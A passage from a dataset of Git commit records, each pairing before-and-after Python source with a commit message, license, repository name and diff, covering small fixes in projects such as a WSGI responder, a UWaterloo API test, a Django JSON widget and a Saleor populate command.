resp_func = getattr(responders, request_type)#Fetch the handfler by request type, using some introspection magic in responders/__init__.py
except AttributeError:
raise Exception("Unknown request {0}".format(request_type))
response = resp_func(returndata)
#todo: make the response handling part of the handler, to avoid this branching
#This will become necessary when we have more handlers with different response types (e.g. other downloads)
if request_type == "downloadtable":#Respond to a download request with a text attachment
status = '200 OK'
response_headers = [('Content-type', 'text/plain'),('Content-Disposition','attachment; filename=download.txt')]
start_response(status, response_headers)
for item in response:
yield item
else:#respond to any other event with json
response = simplejson.dumps(response)
status = '200 OK'
response_headers = [('Content-type', 'application/json'),
('Content-Length', str(len(response)))]
start_response(status, response_headers)
yield response
print('@@@@ Responded to {0} in {1}s'.format(request_type, tm.Elapsed()))
|
from urlparse import parse_qs
import DQXUtils
import simplejson
import responders
def application(environ, start_response):
returndata = dict((k,v[0]) for k,v in parse_qs(environ['QUERY_STRING']).items())
request_type = returndata['datatype']
tm = DQXUtils.Timer()
try:
resp_func = getattr(responders, request_type)#Fetch the handfler by request type, using some introspection magic in responders/__init__.py
except AttributeError:
raise Exception("Unknown request {0}".format(request_type))
response = resp_func(returndata)
#todo: make the response handling part of the handler, to avoid this branching
#This will become necessary when we have more handlers with different response types (e.g. other downloads)
if request_type == "downloadtable":#Respond to a download request with a text attachment
status = '200 OK'
response_headers = [('Content-type', 'text/plain'),('Content-Disposition','attachment; filename=download.txt')]
start_response(status, response_headers)
for item in response:
yield item
else:#respond to any other event with json
response = simplejson.dumps(response, use_decimal=True)
status = '200 OK'
response_headers = [('Content-type', 'application/json'),
('Content-Length', str(len(response)))]
start_response(status, response_headers)
yield response
print('@@@@ Responded to {0} in {1}s'.format(request_type, tm.Elapsed()))
|
Add use_decimal=True for json encoding
|
Add use_decimal=True for json encoding
|
Python
|
agpl-3.0
|
cggh/DQXServer
|
---
+++
@@ -24,7 +24,7 @@
for item in response:
yield item
else:#respond to any other event with json
- response = simplejson.dumps(response)
+ response = simplejson.dumps(response, use_decimal=True)
status = '200 OK'
response_headers = [('Content-type', 'application/json'),
('Content-Length', str(len(response)))]
|
cca6a727063c63d78d61ee81c892811238139462
|
lame_test.py
|
lame_test.py
|
# Just barely tests things to make sure they work
from uwaterlooapi import UWaterlooAPI; api = UWaterlooAPI(api_key='fda8e642f9c9480800e8c02896744288')
exclude = ['api_key', 'base_url']
for attr in dir(api):
if attr.startswith("_"): continue
if attr in exclude: continue
f = getattr(api, attr)
print attr
try:
f()
except TypeError:
f("query")
|
# Just barely tests things to make sure they work
import datetime
from uwaterlooapi import UWaterlooAPI; api = UWaterlooAPI(api_key='fda8e642f9c9480800e8c02896744288')
exclude = ['api_key', 'base_url']
dates = (datetime.datetime.now().year, datetime.datetime.now().date().isocalendar()[1])
args_map = {
'announcements_by_week': dates,
'menu_by_week': dates,
'notes_by_week': dates,
'course': ('CS', '486'),
'course_examschedule': ('CS', '486'),
'course_prerequistes': ('CS', '486'),
'course_schedule': ('CS', '486'),
'course_by_building_room': ('MC', '2038'),
'term_course_schedule': ('1141', 'CS', '486'),
'term_subject_schedule': ('1141', 'CS'),
}
for attr in dir(api):
if attr.startswith("_"): continue
if attr in exclude: continue
f = getattr(api, attr)
print(attr)
try:
f()
except TypeError:
try:
args = ("query",)
if attr in args_map:
args = args_map[attr]
f(*args)
except Exception as e:
print(e.message)
except Exception as e:
print(e.message)
|
Update lame test to test on multiple parameters.
|
Update lame test to test on multiple parameters.
|
Python
|
mit
|
albertoconnor/uwaterlooapi
|
---
+++
@@ -1,15 +1,41 @@
# Just barely tests things to make sure they work
+import datetime
from uwaterlooapi import UWaterlooAPI; api = UWaterlooAPI(api_key='fda8e642f9c9480800e8c02896744288')
exclude = ['api_key', 'base_url']
+
+dates = (datetime.datetime.now().year, datetime.datetime.now().date().isocalendar()[1])
+
+
+args_map = {
+ 'announcements_by_week': dates,
+ 'menu_by_week': dates,
+ 'notes_by_week': dates,
+ 'course': ('CS', '486'),
+ 'course_examschedule': ('CS', '486'),
+ 'course_prerequistes': ('CS', '486'),
+ 'course_schedule': ('CS', '486'),
+ 'course_by_building_room': ('MC', '2038'),
+ 'term_course_schedule': ('1141', 'CS', '486'),
+ 'term_subject_schedule': ('1141', 'CS'),
+}
+
for attr in dir(api):
if attr.startswith("_"): continue
if attr in exclude: continue
f = getattr(api, attr)
- print attr
+ print(attr)
try:
f()
except TypeError:
- f("query")
+ try:
+ args = ("query",)
+ if attr in args_map:
+ args = args_map[attr]
+ f(*args)
+ except Exception as e:
+ print(e.message)
+ except Exception as e:
+ print(e.message)
|
44e8f8db3e39d083de74e4534403e327cb5d389a
|
alexandria/__init__.py
|
alexandria/__init__.py
|
import logging
log = logging.getLogger(__name__)
from pyramid.config import Configurator
from sqlalchemy import engine_from_config
from .models import DBSession
required_settings = [
'pyramid.secret.session',
'pyramid.secret.auth',
]
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
config = Configurator(settings=settings)
do_start = True
for _req in required_settings:
if _req not in settings:
log.error('{} is not set in configuration file.'.format(_req))
do_start = False
if do_start is False:
log.error('Unable to start due to missing configuration')
exit(-1)
config.add_static_view('static', 'static', cache_max_age=3600)
|
import logging
log = logging.getLogger(__name__)
from pyramid.config import Configurator
from sqlalchemy import engine_from_config
from .models import DBSession
required_settings = [
'pyramid.secret.session',
'pyramid.secret.auth',
]
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
config = Configurator(settings=settings)
do_start = True
for _req in required_settings:
if _req not in settings:
log.error('{} is not set in configuration file.'.format(_req))
do_start = False
if do_start is False:
log.error('Unable to start due to missing configuration')
exit(-1)
# Include the transaction manager
config.include('pyramid_tm')
config.add_static_view('static', 'static', cache_max_age=3600)
|
Make sure to use the Pyramid transaction manager
|
Make sure to use the Pyramid transaction manager
|
Python
|
isc
|
cdunklau/alexandria,cdunklau/alexandria,bertjwregeer/alexandria,cdunklau/alexandria,bertjwregeer/alexandria
|
---
+++
@@ -29,6 +29,8 @@
log.error('Unable to start due to missing configuration')
exit(-1)
+ # Include the transaction manager
+ config.include('pyramid_tm')
config.add_static_view('static', 'static', cache_max_age=3600)
|
cc43b4f14706027c0bd0c15e1467d5df586faff8
|
shoop/front/apps/simple_order_notification/templates.py
|
shoop/front/apps/simple_order_notification/templates.py
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
MESSAGE_SUBJECT_TEMPLATE = "{{ order.shop }} - Order {{ order.identifier }} Received"
MESSAGE_BODY_TEMPLATE = """
Thank you for your order, {{ order.customer }}!
Your order has been received and will be processed as soon as possible.
For reference, here's a list of your order's contents.
{% for line in order.lines.all() %}
{%- if line.taxful_price %}
* {{ line.quantity }} x {{ line.text }} - {{ line.taxful_price|money }}
{% endif -%}
{%- endfor %}
Order Total: {{ order.taxful_total_price|money }}
{% if not order.is_paid() %}
Please note that no record of your order being paid currently exists.
{% endif %}
Thank you for shopping with us!
""".strip()
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
MESSAGE_SUBJECT_TEMPLATE = "{{ order.shop }} - Order {{ order.identifier }} Received"
MESSAGE_BODY_TEMPLATE = """
Thank you for your order, {{ order.customer }}!
Your order has been received and will be processed as soon as possible.
For reference, here's a list of your order's contents.
{% for line in order.lines.all() %}
* {{ line.quantity }} x {{ line.text }} - {{ line.taxful_price|money }}
{%- endfor %}
Order Total: {{ order.taxful_total_price|money }}
{% if not order.is_paid() %}
Please note that no record of your order being paid currently exists.
{% endif %}
Thank you for shopping with us!
""".strip()
|
Remove price check from order email template
|
Remove price check from order email template
For some reason, only lines with prices were rendered in the email. Changed
this so that the free lines (from campaigns) are shown also.
No ref
|
Python
|
agpl-3.0
|
shawnadelic/shuup,shawnadelic/shuup,suutari/shoop,suutari-ai/shoop,suutari/shoop,hrayr-artunyan/shuup,shoopio/shoop,suutari/shoop,shoopio/shoop,shoopio/shoop,suutari-ai/shoop,suutari-ai/shoop,hrayr-artunyan/shuup,hrayr-artunyan/shuup,shawnadelic/shuup
|
---
+++
@@ -15,9 +15,7 @@
For reference, here's a list of your order's contents.
{% for line in order.lines.all() %}
-{%- if line.taxful_price %}
* {{ line.quantity }} x {{ line.text }} - {{ line.taxful_price|money }}
-{% endif -%}
{%- endfor %}
Order Total: {{ order.taxful_total_price|money }}
|
c16e2fed1b64c2d875c99940912e2aa3e5d6c33f
|
polyaxon/auditor/service.py
|
polyaxon/auditor/service.py
|
import tracker
from auditor.manager import default_manager
from event_manager.event_service import EventService
class AuditorService(EventService):
"""An service that just passes the event to author services."""
event_manager = default_manager
def get_event(self, event_type, instance, **kwargs):
return {
'event_type': event_type,
'instance': instance,
'kwargs': kwargs
}
def record_event(self, event):
tracker.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
def setup(self):
# Load default event types
import auditor.events # noqa
|
import auditor
import tracker
from auditor.manager import default_manager
from event_manager.event_service import EventService
class AuditorService(EventService):
"""An service that just passes the event to author services."""
event_manager = default_manager
def get_event(self, event_type, instance, **kwargs):
return {
'event_type': event_type,
'instance': instance,
'kwargs': kwargs
}
def record_event(self, event):
tracker.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
auditor.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
def setup(self):
# Load default event types
import auditor.events # noqa
|
Add activity logs to auditor tracking
|
Add activity logs to auditor tracking
|
Python
|
apache-2.0
|
polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon
|
---
+++
@@ -1,3 +1,4 @@
+import auditor
import tracker
from auditor.manager import default_manager
@@ -20,6 +21,9 @@
tracker.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
+ auditor.record(event_type=event['event_type'],
+ instance=event['instance'],
+ **event['kwargs'])
def setup(self):
# Load default event types
|
61394aec9d2193a978a0754bb43f70d1f66262d4
|
django_json_widget/widgets.py
|
django_json_widget/widgets.py
|
import json
from builtins import super
from django import forms
from django.templatetags.static import static
class JSONEditorWidget(forms.Widget):
class Media:
css = {'all': (static('dist/jsoneditor.min.css'), )}
js = (static('dist/jsoneditor.min.js'),)
template_name = 'django_json_widget.html'
def __init__(self, attrs=None, mode='code', options=None, width=None, height=None):
default_options = {
'modes': ['text', 'code', 'tree', 'form', 'view'],
'mode': mode,
'search': True,
}
if options:
default_options.update(options)
self.options = default_options
self.width = width
self.height = height
super(JSONEditorWidget, self).__init__(attrs=attrs)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['options'] = json.dumps(self.options)
context['widget']['width'] = self.width
context['widget']['height'] = self.height
return context
|
import json
from builtins import super
from django import forms
class JSONEditorWidget(forms.Widget):
class Media:
css = {'all': ('dist/jsoneditor.min.css', )}
js = ('dist/jsoneditor.min.js',)
template_name = 'django_json_widget.html'
def __init__(self, attrs=None, mode='code', options=None, width=None, height=None):
default_options = {
'modes': ['text', 'code', 'tree', 'form', 'view'],
'mode': mode,
'search': True,
}
if options:
default_options.update(options)
self.options = default_options
self.width = width
self.height = height
super(JSONEditorWidget, self).__init__(attrs=attrs)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['options'] = json.dumps(self.options)
context['widget']['width'] = self.width
context['widget']['height'] = self.height
return context
|
Stop resolving paths to the static files.
|
Stop resolving paths to the static files.
Fixed #33
|
Python
|
mit
|
jmrivas86/django-json-widget,jmrivas86/django-json-widget
|
---
+++
@@ -2,13 +2,12 @@
from builtins import super
from django import forms
-from django.templatetags.static import static
class JSONEditorWidget(forms.Widget):
class Media:
- css = {'all': (static('dist/jsoneditor.min.css'), )}
- js = (static('dist/jsoneditor.min.js'),)
+ css = {'all': ('dist/jsoneditor.min.css', )}
+ js = ('dist/jsoneditor.min.js',)
template_name = 'django_json_widget.html'
|
d309fba3d07b3122bdb05d511968b53f1c59b357
|
opps/images/widgets.py
|
opps/images/widgets.py
|
from django import forms
from django.conf import settings
from django.template.loader import render_to_string
class MultipleUpload(forms.FileInput):
def render(self, name, value, attrs=None):
_value = ""
if value:
_value = "{0}{1}".format(settings.MEDIA_URL, value)
return render_to_string("admin/opps/images/multiupload.html",
{"name": name, "value": _value,
"STATIC_URL": settings.STATIC_URL})
class CropExample(forms.TextInput):
def render(self, name, value, attrs=None):
if u'http' not in value:
value = u"{}{}".format(settings.THUMBOR_MEDIA_URL, value)
return render_to_string(
"admin/opps/images/cropexample.html",
{"name": name, "value": value,
"THUMBOR_SERVER": settings.THUMBOR_SERVER,
"THUMBOR_MEDIA_URL": settings.THUMBOR_MEDIA_URL})
|
from django import forms
from django.conf import settings
from django.template.loader import render_to_string
class MultipleUpload(forms.FileInput):
def render(self, name, value, attrs=None):
_value = ""
if value:
_value = "{0}{1}".format(settings.MEDIA_URL, value)
return render_to_string("admin/opps/images/multiupload.html",
{"name": name, "value": _value,
"STATIC_URL": settings.STATIC_URL})
class CropExample(forms.TextInput):
def render(self, name, value, attrs=None):
return render_to_string(
"admin/opps/images/cropexample.html",
{"name": name, "value": value,
"THUMBOR_SERVER": settings.THUMBOR_SERVER,
"THUMBOR_MEDIA_URL": settings.THUMBOR_MEDIA_URL})
|
Fix bug on images widget CropExample
|
Fix bug on images widget CropExample
|
Python
|
mit
|
williamroot/opps,opps/opps,jeanmask/opps,YACOWS/opps,jeanmask/opps,YACOWS/opps,YACOWS/opps,williamroot/opps,opps/opps,opps/opps,williamroot/opps,williamroot/opps,jeanmask/opps,jeanmask/opps,opps/opps,YACOWS/opps
|
---
+++
@@ -4,7 +4,6 @@
class MultipleUpload(forms.FileInput):
-
def render(self, name, value, attrs=None):
_value = ""
if value:
@@ -15,10 +14,7 @@
class CropExample(forms.TextInput):
-
def render(self, name, value, attrs=None):
- if u'http' not in value:
- value = u"{}{}".format(settings.THUMBOR_MEDIA_URL, value)
return render_to_string(
"admin/opps/images/cropexample.html",
{"name": name, "value": value,
|
ccb9e3d0fca96b853cabe0c9569dda1414409618
|
enactiveagents/model/perceptionhandler.py
|
enactiveagents/model/perceptionhandler.py
|
"""
Module that holds classes that represent an agent's perception handler.
"""
import abc
import world
import structure
class PerceptionHandler(object):
"""
Abstract perception handler class.
"""
@abc.abstractmethod
def perceive(self, agent, world):
"""
Generates a percept given an agent and a world.
:param agent: The agent to generate the percept for.
:param world: The world to generate the percept for.
:return: The percept.
"""
raise NotImplementedError("Should be implemented by child")
class EmptyPerceptionHandler(PerceptionHandler):
"""
A trivial perception handler that never perceives anything.
"""
def perceive(self, agent, world):
return ""
class BasicPerceptionHandler(PerceptionHandler):
"""
A perception handler that perceives walls and blocks up to a given distance.
The perception indicates the type of structure that is seen, as well as its
distance.
"""
def perceive(self, agent_, world_):
for delta in range(0, 10):
pos = world.Position(agent_.get_position())
pos.add(agent_.get_move_delta(delta))
entities = world_.get_entities_at(pos)
for entity in entities:
if entity == agent_:
continue
if isinstance(entity, structure.Wall):
return "w%s" % delta
elif isinstance(entity, structure.Block):
return "b%s" % delta
elif isinstance(entity, structure.Food):
return "f%s" % delta
return ""
|
"""
Module that holds classes that represent an agent's perception handler.
"""
import abc
import world
import agent
import structure
class PerceptionHandler(object):
"""
Abstract perception handler class.
"""
@abc.abstractmethod
def perceive(self, agent, world):
"""
Generates a percept given an agent and a world.
:param agent: The agent to generate the percept for.
:param world: The world to generate the percept for.
:return: The percept.
"""
raise NotImplementedError("Should be implemented by child")
class EmptyPerceptionHandler(PerceptionHandler):
"""
A trivial perception handler that never perceives anything.
"""
def perceive(self, agent, world):
return ""
class BasicPerceptionHandler(PerceptionHandler):
"""
A perception handler that perceives walls and blocks up to a given distance.
The perception indicates the type of structure that is seen, as well as its
distance.
"""
def perceive(self, agent_, world_):
for delta in range(0, 10):
pos = world.Position(agent_.get_position())
pos.add(agent_.get_move_delta(delta))
entities = world_.get_entities_at(pos)
for entity in entities:
if entity == agent_:
continue
if isinstance(entity, agent.Agent):
return "a%s" % delta
elif isinstance(entity, structure.Wall):
return "w%s" % delta
elif isinstance(entity, structure.Block):
return "b%s" % delta
elif isinstance(entity, structure.Food):
return "f%s" % delta
return ""
|
Make agents able to see each other.
|
Make agents able to see each other.
|
Python
|
mit
|
Beskhue/enactive-agents,Beskhue/enactive-agents,Beskhue/enactive-agents
|
---
+++
@@ -4,6 +4,7 @@
import abc
import world
+import agent
import structure
class PerceptionHandler(object):
@@ -47,7 +48,9 @@
for entity in entities:
if entity == agent_:
continue
- if isinstance(entity, structure.Wall):
+ if isinstance(entity, agent.Agent):
+ return "a%s" % delta
+ elif isinstance(entity, structure.Wall):
return "w%s" % delta
elif isinstance(entity, structure.Block):
return "b%s" % delta
|
061872f2a89656250a1de32338663ebd6900b602
|
scripts/filter-pyvcf.py
|
scripts/filter-pyvcf.py
|
import sys
from vcf import Reader
import gzip
vcf = Reader(open(sys.argv[1], 'r'))
n = 0
for v in vcf:
if len(v.ALT) > 1: continue
if v.QUAL < 20: continue
if v.aaf[0] > 0.05: continue
n += 1
print(n)
|
import sys
from vcf import Reader
import gzip
vcf = Reader(open(sys.argv[1], 'rb'))
n = 0
for v in vcf:
if len(v.ALT) > 1: continue
if v.QUAL < 20: continue
if v.aaf[0] > 0.05: continue
n += 1
print(n)
|
Fix error while running compare.sh
|
Fix error while running compare.sh
bash compare.sh
#pyvcf
Traceback (most recent call last):
File "filter-pyvcf.py", line 5, in <module>
vcf = Reader(open(sys.argv[1], 'rt'))
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/site-packages/vcf/parser.py", line 300, in __init__
self._parse_metainfo()
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/site-packages/vcf/parser.py", line 317, in _parse_metainfo
line = next(self.reader)
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/site-packages/vcf/parser.py", line 280, in <genexpr>
self.reader = (line.strip() for line in self._reader if line.strip())
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 642, in __next__
line = self.readline()
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 555, in readline
data = self.read(readsize, firstline=True)
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 495, in read
newdata = self.stream.read(size)
File "/usr/lib/python3.5/gzip.py", line 274, in read
return self._buffer.read(size)
File "/usr/lib/python3.5/_compression.py", line 68, in readinto
data = self.read(len(byte_view))
File "/usr/lib/python3.5/gzip.py", line 461, in read
if not self._read_gzip_header():
File "/usr/lib/python3.5/gzip.py", line 404, in _read_gzip_header
magic = self._fp.read(2)
File "/usr/lib/python3.5/gzip.py", line 91, in read
self.file.read(size-self._length+read)
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 321, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0x8b in position 1: invalid start byte
real 0m0.085s
user 0m0.072s
sys 0m0.012s
|
Python
|
mit
|
brentp/cyvcf2,brentp/cyvcf2,brentp/cyvcf2
|
---
+++
@@ -2,7 +2,7 @@
from vcf import Reader
import gzip
-vcf = Reader(open(sys.argv[1], 'r'))
+vcf = Reader(open(sys.argv[1], 'rb'))
n = 0
for v in vcf:
|
2c83c171a8594f708e3a12c0435c7d0aa20d68ad
|
scripts/iface-choice.py
|
scripts/iface-choice.py
|
#apt-get install python-pip
#pip install netifaces
import netifaces
def select_iface(iface):
try:
iface = int(iface)
if(iface < 0):
raise IndexError
return netifaces.interfaces()[iface]
except IndexError:
print "Number provided was too big or small"
return []
except ValueError:
print "Please enter an interface number"
return []
print "Please choose a network interface to run the honeypot on:\r\n"
i = 0
for ifaces in netifaces.interfaces():
print "\t[",i,"]",ifaces,"(",netifaces.ifaddresses(ifaces)[netifaces.AF_INET],")"
i = i+1
print "\r\n"
found = []
while(not found):
found=select_iface(raw_input('Chosen interface: '))
print found
|
#apt-get install python-pip
#pip install netifaces
import netifaces
def select_iface(iface):
try:
iface = int(iface)
if(iface < 0):
raise IndexError
return netifaces.interfaces()[iface]
except IndexError:
print "Number provided was too big or small"
return []
except ValueError:
print "Please enter an interface number"
return []
print "Please choose a network interface to run the honeypot on:\r\n"
i = 0
for ifaces in netifaces.interfaces():
print "\t[",i,"]",ifaces,"(",netifaces.ifaddresses(ifaces)[netifaces.AF_INET],")"
i = i+1
print "\r\n"
found = []
while(not found):
found=select_iface(raw_input('Chosen interface: '))
f = open(os.path.expanduser('~/.honey_iface'), 'w')
f.write(found)
|
Write iface choice to file
|
Write iface choice to file
This seems unnecessary but I can't see a way to pass a string back from python, because of the prompt.
|
Python
|
mit
|
andrewmichaelsmith/manuka,g1eagle/E-Pot
|
---
+++
@@ -19,7 +19,6 @@
print "Please choose a network interface to run the honeypot on:\r\n"
i = 0
-
for ifaces in netifaces.interfaces():
print "\t[",i,"]",ifaces,"(",netifaces.ifaddresses(ifaces)[netifaces.AF_INET],")"
i = i+1
@@ -30,4 +29,8 @@
while(not found):
found=select_iface(raw_input('Chosen interface: '))
-print found
+f = open(os.path.expanduser('~/.honey_iface'), 'w')
+f.write(found)
+
+
+
|
45a319f4bf4ae310a2299b58cf8a3f907fdb7f3c
|
receipt_tracker/urls.py
|
receipt_tracker/urls.py
|
"""receipt_tracker URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.contrib import admin
from receipt_tracker import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('core.urls')),
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
"""receipt_tracker URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.contrib import admin
from receipt_tracker import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('core.urls')),
]
#urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
Disable static to get something running
|
Disable static to get something running
|
Python
|
agpl-3.0
|
openreceipts/openreceipts-server,openreceipts/openreceipts-server,openreceipts/openreceipts-server
|
---
+++
@@ -24,5 +24,5 @@
url(r'^', include('core.urls')),
]
-urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
+#urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
0c2374c11c83c10fc67fd283abf699d7becb4311
|
app/event/erase_basic/step_settings.py
|
app/event/erase_basic/step_settings.py
|
step = {
'@type': {
'type': 'string',
'allowed': ['Zero', 'Random'],
'required': True
},
'success': {
'type': 'boolean',
'required': True
},
'startingTime': {
'type': 'datetime'
},
'endingTime': {
'type': 'datetime'
}
}
|
step = {
'@type': {
'type': 'string',
'allowed': ['Zeros', 'Random'],
'required': True
},
'success': {
'type': 'boolean',
'required': True
},
'startingTime': {
'type': 'datetime'
},
'endingTime': {
'type': 'datetime'
}
}
|
Change EraseBasic's step type from 'Zero' to 'Zeros'
|
Change EraseBasic's step type from 'Zero' to 'Zeros'
|
Python
|
agpl-3.0
|
eReuse/DeviceHub,eReuse/DeviceHub
|
---
+++
@@ -1,7 +1,7 @@
step = {
'@type': {
'type': 'string',
- 'allowed': ['Zero', 'Random'],
+ 'allowed': ['Zeros', 'Random'],
'required': True
},
'success': {
|
02a95bafbcf739cef6306cdd0d785743f2dd7370
|
saleor/product/management/commands/populatedb.py
|
saleor/product/management/commands/populatedb.py
|
from django.core.management.base import BaseCommand
from django.db import IntegrityError
from utils.create_random_data import create_items, create_users, create_orders
from saleor.userprofile.models import User
class Command(BaseCommand):
help = 'Populate database with test objects'
placeholders_dir = r'saleor/static/placeholders/'
def add_arguments(self, parser):
parser.add_argument(
'--createsuperuser',
action='store_true',
dest='createsuperuser',
default=False,
help='Create admin account')
def handle(self, *args, **options):
for msg in create_items(self.placeholders_dir, 10):
self.stdout.write(msg)
for msg in create_users(10):
self.stdout.write(msg)
for msg in create_orders(20):
self.stdout.write(msg)
if options['createsuperuser']:
credentials = {'email': 'admin@example.com', 'password': 'admin'}
try:
User.objects.create_superuser(**credentials)
except IntegrityError:
self.stdout.write(
'Superuser already exists - %(email)s' % credentials)
else:
self.stdout.write(
'Superuser - %(email)s/%(password)s' % credentials)
|
from django.core.management.base import BaseCommand
from utils.create_random_data import create_items, create_users, create_orders
from saleor.userprofile.models import User
class Command(BaseCommand):
help = 'Populate database with test objects'
placeholders_dir = r'saleor/static/placeholders/'
def add_arguments(self, parser):
parser.add_argument(
'--createsuperuser',
action='store_true',
dest='createsuperuser',
default=False,
help='Create admin account')
def handle(self, *args, **options):
for msg in create_items(self.placeholders_dir, 10):
self.stdout.write(msg)
for msg in create_users(10):
self.stdout.write(msg)
for msg in create_orders(20):
self.stdout.write(msg)
if options['createsuperuser']:
credentials = {'email': 'admin@example.com', 'password': 'admin'}
user, created = User.objects.get_or_create(
email=credentials['email'],
is_active=True, is_staff=True, is_superuser=True)
if created:
user.set_password(credentials['password'])
user.save()
self.stdout.write(
'Superuser - %(email)s/%(password)s' % credentials)
else:
self.stdout.write(
'Superuser already exists - %(email)s' % credentials)
|
Use get_or_create instead of catching exception
|
Use get_or_create instead of catching exception
|
Python
|
bsd-3-clause
|
HyperManTT/ECommerceSaleor,car3oon/saleor,car3oon/saleor,laosunhust/saleor,spartonia/saleor,UITools/saleor,KenMutemi/saleor,tfroehlich82/saleor,tfroehlich82/saleor,car3oon/saleor,HyperManTT/ECommerceSaleor,tfroehlich82/saleor,itbabu/saleor,maferelo/saleor,laosunhust/saleor,laosunhust/saleor,laosunhust/saleor,maferelo/saleor,KenMutemi/saleor,rodrigozn/CW-Shop,rodrigozn/CW-Shop,KenMutemi/saleor,jreigel/saleor,maferelo/saleor,rchav/vinerack,itbabu/saleor,jreigel/saleor,mociepka/saleor,rchav/vinerack,spartonia/saleor,jreigel/saleor,HyperManTT/ECommerceSaleor,rodrigozn/CW-Shop,mociepka/saleor,spartonia/saleor,mociepka/saleor,rchav/vinerack,itbabu/saleor,UITools/saleor,UITools/saleor,spartonia/saleor,UITools/saleor,UITools/saleor
|
---
+++
@@ -1,5 +1,4 @@
from django.core.management.base import BaseCommand
-from django.db import IntegrityError
from utils.create_random_data import create_items, create_users, create_orders
@@ -28,11 +27,14 @@
if options['createsuperuser']:
credentials = {'email': 'admin@example.com', 'password': 'admin'}
- try:
- User.objects.create_superuser(**credentials)
- except IntegrityError:
+ user, created = User.objects.get_or_create(
+ email=credentials['email'],
+ is_active=True, is_staff=True, is_superuser=True)
+ if created:
+ user.set_password(credentials['password'])
+ user.save()
+ self.stdout.write(
+ 'Superuser - %(email)s/%(password)s' % credentials)
+ else:
self.stdout.write(
'Superuser already exists - %(email)s' % credentials)
- else:
- self.stdout.write(
- 'Superuser - %(email)s/%(password)s' % credentials)
|
f5baf5aab4570f54e686ecf6c69f5100bf077d8b
|
openstack_dashboard/fiware_oauth2/urls.py
|
openstack_dashboard/fiware_oauth2/urls.py
|
# Copyright (C) 2014 Universidad Politecnica de Madrid
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import patterns
from django.conf.urls import url
from openstack_dashboard.fiware_oauth2 import views
# NOTE(garcianavalon) following
# https://github.com/ging/fi-ware-idm/wiki/Using-the-FI-LAB-instance
urlpatterns = patterns(
'fiware_oauth2.views',
url(r"^oauth2/authorize/$", views.AuthorizeView.as_view(),
name='fiware_oauth2_authorize'),
url(r"^oauth2/authorize/cancel/$", views.cancel_authorize,
name='fiware_oauth2_cancel_authorize'),
url(r"^oauth2/token$", views.AccessTokenView.as_view(),
name='fiware_oauth2_access_token'),
url(r"^user", views.UserInfoView.as_view(),
name='fiware_oauth2_user_info'),
)
|
# Copyright (C) 2014 Universidad Politecnica de Madrid
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
